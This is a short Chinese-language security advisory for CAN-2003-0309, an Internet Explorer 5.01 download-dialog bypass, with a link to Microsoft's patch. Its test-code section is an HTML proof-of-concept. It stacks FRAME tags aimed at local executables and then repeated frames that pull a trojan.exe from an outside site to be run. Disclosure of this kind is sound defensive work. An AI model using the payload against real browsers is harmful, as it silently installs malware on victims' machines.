Micorsoft Internet explore下载文件对话框过滤不正确漏洞发布时间:2003-06-05 更新时间:2003-06-05 严重程度:高 威胁程度:普通用户访问权限 错误类型:边界检查错误 利用方式:客户机模式 CVE(CAN) ID:CAN-2003-0309 受影响系统 Microsoft Internet Explorer 5.01详细描述 Internet Explorer不正确实现对文件下载对话框的实现,允许远程攻击者绕过安全区域限制,通过WEB文档使用大量file:// 或其他请求来指向要执行的程序,可导致最后IE判断错误执行任意命令。如可以使用大量FRAME或IFRAME 标记来触发。 测试代码 <FRAME SRC="C:\winnt\welcome.exe"></FRAME> <FRAME SRC="C:\winnt\notepad.exe"></FRAME> <FRAME SRC="C:\winnt\regedit.exe"></FRAME> ... together around 191 ... and after comes our trojan ... <FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME> <FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME> <FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME> <FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME> <FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME> <FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME> <FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME> <FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME> <FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME> <FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME> 解决方案 升级程序: http://www.microsoft.com/windows/ie/downloads/critical/818529/default.asp 相关信息 参考:http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-020.asp |
